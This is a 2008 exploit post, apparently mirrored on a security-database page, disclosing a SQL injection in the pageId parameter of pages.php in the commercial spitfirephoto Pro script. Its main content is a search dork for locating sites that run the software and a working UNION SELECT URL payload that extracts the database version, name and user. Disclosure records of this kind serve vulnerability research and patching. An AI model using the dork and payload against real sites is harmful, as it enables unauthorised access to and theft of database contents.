Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20792
HistoryNov 01, 2008 - 12:00 a.m.

spitfirephoto Pro pages.php Sql Injection

2008-11-0100:00:00
vulners.com
22

################################################################

Author: Beenu Arora

Home : www.BeenuArora.com

Email : [email protected]

Share the c0de!

################################################################

Title: spitfirephoto Pro pages.php Sql Injection

Vendor: http://http://www.spitfirephoto.com/ ( Paid Script )

###########################################################

d0rk:Powered by Spitfire Photo Pro

###########################################################

 Live Demo: 

http://localhost/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())--

###########################################################

Bug discovered : 30 Oct.2008

###########################################################